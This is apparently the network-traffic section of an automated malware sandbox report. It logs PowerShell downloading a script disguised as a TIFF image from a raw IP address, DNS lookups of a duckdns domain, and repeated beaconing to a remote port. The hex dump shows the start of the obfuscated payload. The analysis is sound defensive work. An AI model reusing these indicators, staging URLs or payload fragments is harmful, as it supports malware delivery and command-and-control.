                                                                            Nov 26, 2024 09:44:47.945909977 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.946702957 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947093010 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947139025 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.947609901 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947745085 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.947787046 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.948486090 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.948797941 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.948842049 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.949363947 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.949593067 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.949639082 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.950275898 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.950293064 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.950335979 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.951167107 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.951690912 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.951766014 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.952061892 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.952280045 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.952321053 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.952914000 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.953041077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.953083038 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.953799009 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.953969955 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.954014063 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.954694986 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955378056 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955425024 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.955606937 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955620050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.955662012 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.956526041 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.956671000 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.956718922 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.957413912 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.957717896 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.957765102 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.958264112 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.958980083 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.959038973 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.959175110 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.959395885 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.959439993 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.960038900 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.960437059 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.960485935 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.960930109 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.961112976 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.961169004 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.961808920 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.962102890 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.962155104 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.962723970 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963134050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963190079 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.963764906 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963903904 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.963946104 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.964665890 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.964677095 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.964710951 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.965442896 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.965666056 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.965711117 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.966237068 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967184067 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967195034 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967214108 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.967231989 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.967308044 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.967989922 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:48.011610031 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:48.016836882 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:48.362716913 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:48.483082056 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:48.483196974 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:48.488744974 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:48.608779907 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:58.938816071 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:58.938983917 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:58.943083048 CET4973914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:44:59.063580990 CET1464549739192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:44:59.950202942 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:00.070489883 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:00.072690010 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:00.076925039 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:00.196919918 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:10.456043005 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:10.456135988 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:10.456367016 CET4974014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:10.578845978 CET1464549740192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:11.465852022 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:11.585983038 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:11.588681936 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:11.592628956 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:11.712730885 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:22.004216909 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:22.004451990 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:22.004451990 CET4974314645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:22.124737024 CET1464549743192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:23.012909889 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:23.133491993 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:23.133661985 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:23.139367104 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:23.260698080 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:33.642292976 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:33.642369032 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:33.642573118 CET4976914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:33.762574911 CET1464549769192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:34.653573990 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:34.773487091 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:34.773576021 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:34.777359962 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:34.897430897 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:45.143790960 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:45.143923044 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:45.143991947 CET4979514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:45.263911009 CET1464549795192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:46.153450966 CET4982114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:46.273484945 CET1464549821192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:46.273597002 CET4982114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:46.277594090 CET4982114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:46.397864103 CET1464549821192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:56.640008926 CET1464549821192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:56.640094042 CET4982114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:56.640130997 CET4982114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:56.760216951 CET1464549821192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:57.978399992 CET4985014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:58.098529100 CET1464549850192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:45:58.100764036 CET4985014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:58.104233980 CET4985014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:45:58.224766016 CET1464549850192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:08.570736885 CET1464549850192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:08.570873976 CET4985014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:08.570970058 CET4985014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:08.690846920 CET1464549850192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:09.591171026 CET4987614645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:09.711194992 CET1464549876192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:09.715029001 CET4987614645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:09.724911928 CET4987614645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:09.845141888 CET1464549876192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:20.191061020 CET1464549876192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:20.192796946 CET4987614645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:20.192852020 CET4987614645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:20.312752008 CET1464549876192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:21.204253912 CET4990414645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:21.324278116 CET1464549904192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:21.324364901 CET4990414645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:21.331188917 CET4990414645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:21.451252937 CET1464549904192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:31.772499084 CET1464549904192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:31.772603035 CET4990414645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:31.772680044 CET4990414645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:31.892666101 CET1464549904192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:32.779874086 CET4992914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:32.899967909 CET1464549929192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:32.900096893 CET4992914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:32.903692961 CET4992914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:33.024164915 CET1464549929192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:43.329519987 CET1464549929192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:43.329673052 CET4992914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:43.329760075 CET4992914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:43.449655056 CET1464549929192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:44.348464012 CET4995514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:44.470700026 CET1464549955192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:44.470947981 CET4995514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:44.478220940 CET4995514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:44.601511955 CET1464549955192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:54.966900110 CET1464549955192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:54.967036963 CET4995514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:54.967113018 CET4995514645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:55.087368965 CET1464549955192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:55.982394934 CET4998014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:56.103122950 CET1464549980192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:46:56.103252888 CET4998014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:56.107343912 CET4998014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:46:56.227368116 CET1464549980192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:06.569847107 CET1464549980192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:06.569998026 CET4998014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:06.614589930 CET4998014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:06.734750986 CET1464549980192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:07.948971987 CET5000714645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:08.068936110 CET1464550007192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:08.069292068 CET5000714645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:08.072770119 CET5000714645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:08.193361044 CET1464550007192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:18.496362925 CET1464550007192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:18.496445894 CET5000714645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:18.507189035 CET5000714645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:18.627496958 CET1464550007192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:19.513073921 CET5001814645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:19.636286974 CET1464550018192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:19.636912107 CET5001814645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:19.641673088 CET5001814645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:19.766365051 CET1464550018192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:30.019269943 CET1464550018192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:30.019356966 CET5001814645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:30.019511938 CET5001814645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:30.139823914 CET1464550018192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:31.028881073 CET5001914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:31.149070978 CET1464550019192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:31.149221897 CET5001914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:31.154171944 CET5001914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:31.276338100 CET1464550019192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:41.573354959 CET1464550019192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:41.573419094 CET5001914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:41.573457956 CET5001914645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:41.693478107 CET1464550019192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:42.576904058 CET5002014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:42.697312117 CET1464550020192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:42.701124907 CET5002014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:42.704437971 CET5002014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:42.824347019 CET1464550020192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:53.017210960 CET1464550020192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:53.017292023 CET5002014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:53.017323971 CET5002014645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:53.137594938 CET1464550020192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:54.041349888 CET5002114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:54.161386013 CET1464550021192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:47:54.161494017 CET5002114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:54.165134907 CET5002114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:47:54.285110950 CET1464550021192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:48:04.492844105 CET1464550021192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:48:04.494276047 CET5002114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:48:04.497258902 CET5002114645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:48:04.618001938 CET1464550021192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:48:05.513140917 CET5002214645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:48:05.633271933 CET1464550022192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:48:05.633424997 CET5002214645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:48:05.636967897 CET5002214645192.168.2.4192.169.69.26
                                                                            Nov 26, 2024 09:48:05.757077932 CET1464550022192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:48:16.066062927 CET1464550022192.169.69.26192.168.2.4
                                                                            Nov 26, 2024 09:48:16.066157103 CET5002214645192.168.2.4192.169.69.26
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 26, 2024 09:44:23.633275032 CET6028053192.168.2.41.1.1.1
                                                                            Nov 26, 2024 09:44:23.776446104 CET53602801.1.1.1192.168.2.4
                                                                            Nov 26, 2024 09:44:48.038367033 CET6502453192.168.2.41.1.1.1
                                                                            Nov 26, 2024 09:44:48.358700991 CET53650241.1.1.1192.168.2.4
                                                                            Nov 26, 2024 09:45:57.653270006 CET5022253192.168.2.41.1.1.1
                                                                            Nov 26, 2024 09:45:57.977054119 CET53502221.1.1.1192.168.2.4
                                                                            Nov 26, 2024 09:47:07.622060061 CET5615853192.168.2.41.1.1.1
                                                                            Nov 26, 2024 09:47:07.947985888 CET53561581.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Nov 26, 2024 09:44:23.633275032 CET192.168.2.41.1.1.10x9308Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                            Nov 26, 2024 09:44:48.038367033 CET192.168.2.41.1.1.10xfefStandard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Nov 26, 2024 09:45:57.653270006 CET192.168.2.41.1.1.10xc17fStandard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Nov 26, 2024 09:47:07.622060061 CET192.168.2.41.1.1.10x7fe2Standard query (0)nextnewupdationsforu.duckdns.orgA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 26, 2024 09:44:23.776446104 CET1.1.1.1192.168.2.40x9308No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 26, 2024 09:44:23.776446104 CET1.1.1.1192.168.2.40x9308No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                            Nov 26, 2024 09:44:48.358700991 CET1.1.1.1192.168.2.40xfefNo error (0)nextnewupdationsforu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                            Nov 26, 2024 09:45:57.977054119 CET1.1.1.1192.168.2.40xc17fNo error (0)nextnewupdationsforu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                            Nov 26, 2024 09:47:07.947985888 CET1.1.1.1192.168.2.40x7fe2No error (0)nextnewupdationsforu.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                            • 3105.filemail.com
                                                                            • 104.168.46.26
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449730104.168.46.26807492C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 26, 2024 09:44:16.287260056 CET336OUTGET /1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: 104.168.46.26
                                                                            Connection: Keep-Alive
                                                                            Nov 26, 2024 09:44:17.456748962 CET1236INHTTP/1.1 200 OK
                                                                            Date: Tue, 26 Nov 2024 08:44:17 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                            Last-Modified: Tue, 26 Nov 2024 04:01:04 GMT
                                                                            ETag: "28b06-627c8e5e96329"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 166662
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: image/tiff
                                                                            Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 4c 00 57 00 75 00 78 00 69 00 6f 00 62 00 69 00 50 00 47 00 78 00 55 00 72 00 6a 00 51 00 20 00 3d 00 20 00 22 00 47 00 61 00 6b 00 69 00 47 00 6c 00 69 00 5a 00 48 00 65 00 66 00 6b 00 69 00 7a 00 6f 00 22 00 0d 00 0a 00 63 00 52 00 47 00 4b 00 73 00 50 00 5a 00 69 00 5a 00 57 00 6b 00 4c 00 6b 00 6e 00 68 00 20 00 3d 00 20 00 22 00 65 00 41 00 4c 00 4c 00 65 00 4c 00 52 00 57 00 4e 00 66 00 42 00 6e 00 57 00 50 00 4c 00 22 00 0d 00 0a 00 66 00 41 00 7a 00 65 00 74 00 4c 00 65 00 55 00 47 00 4e 00 4e 00 52 00 41 00 6d 00 6b 00 20 00 3d 00 20 00 22 00 74 00 4e 00 4a 00 50 00 69 00 51 00 61 00 63 00 53 00 68 00 65 00 6a 00 4e 00 70 00 64 00 22 00 0d 00 0a 00 4c 00 66 00 69 00 55 00 57 00 6a 00 4b 00 43 00 66 00 43 00 63 00 6b 00 71 00 78 00 62 00 20 00 3d 00 20 00 22 00 4e 00 64 00 5a 00 6b 00 4b 00 7a 00 4c 00 64 00 50 00 5a 00 49 00 4c 00 55 00 61 00 6f 00 22 00 0d 00 0a 00 68 00 4c 00 4c 00 4c 00 57 00 4c 00 4c 00 4f 00 4e 00 69 00 4b 00 66 00 74 00 41 00 75 00 20 00 [TRUNCATED]
                                                                            Data Ascii: LWuxiobiPGxUrjQ = "GakiGliZHefkizo"cRGKsPZiZWkLknh = "eALLeLRWNfBnWPL"fAzetLeUGNNRAmk = "tNJPiQacShejNpd"LfiUWjKCfCckqxb = "NdZkKzLdPZILUao"hLLLWLLONiKftAu = "dioLNilRKLvxiRn"BkkGckkcHRdahpr = "ZPNbpdZiLZmPWLL"NGPWvKLLPzkuLhZ = "CIKWaWWLfGhZKLh"cUWxWUWoPcZLtCh = "cpxeBtffPzGbmLG"cBWOuiGKWumuKGc = "mhLWGWlocLWkWOh"dlGKbicBcbhmkKu = "KmecmiWxsRQHkLL"peNNZiHiUpBlxez = "qbqxhiPnKKLWGib"RbBeWpjBHiKcxPz = "eGPxNTbWjzGiKkp"LpdPGPKk
                                                                            Nov 26, 2024 09:44:17.456774950 CET1236INData Raw: 00 66 00 4c 00 63 00 4c 00 50 00 76 00 62 00 20 00 3d 00 20 00 22 00 65 00 6e 00 7a 00 41 00 57 00 50 00 4c 00 55 00 6f 00 70 00 75 00 47 00 69 00 61 00 63 00 22 00 0d 00 0a 00 47 00 6d 00 7a 00 63 00 66 00 47 00 49 00 65 00 4b 00 5a 00 42 00 57
                                                                            Data Ascii: fLcLPvb = "enzAWPLUopuGiac"GmzcfGIeKZBWuii = "KGeKkAWUaqcpizL"kfoWZcZhlCWzhoB = "dzqALWiuqrWUiLW"hcuGbeLOJIbSZqG =
                                                                            Nov 26, 2024 09:44:17.456787109 CET1236INData Raw: 00 62 00 4a 00 6b 00 4b 00 4c 00 64 00 22 00 0d 00 0a 00 63 00 62 00 78 00 76 00 65 00 4c 00 55 00 5a 00 5a 00 4c 00 63 00 65 00 65 00 43 00 74 00 20 00 3d 00 20 00 22 00 72 00 4f 00 52 00 75 00 53 00 47 00 41 00 6f 00 6f 00 65 00 4b 00 48 00 47
                                                                            Data Ascii: bJkKLd"cbxveLUZZLceeCt = "rORuSGAooeKHGcp"zGxRLjbiALKIWGL = "LpTBmzUkQkApiUf"tozeHWIUkSzWmuk = "LKPKjLWJLfhWKdN"
                                                                            Nov 26, 2024 09:44:17.456796885 CET1236INData Raw: 00 72 00 4c 00 55 00 7a 00 61 00 47 00 20 00 3d 00 20 00 22 00 6c 00 75 00 66 00 6f 00 4b 00 64 00 63 00 57 00 6b 00 50 00 66 00 41 00 6f 00 7a 00 41 00 22 00 0d 00 0a 00 63 00 5a 00 69 00 75 00 4f 00 43 00 47 00 67 00 6f 00 4c 00 57 00 63 00 41
                                                                            Data Ascii: rLUzaG = "lufoKdcWkPfAozA"cZiuOCGgoLWcAUP = "LWURLkieLqWhTOh"cKTpAWGLzUWWoht = "KKzUamWJzxlZJsJ"WbzanzarUnLKgkKoJNG
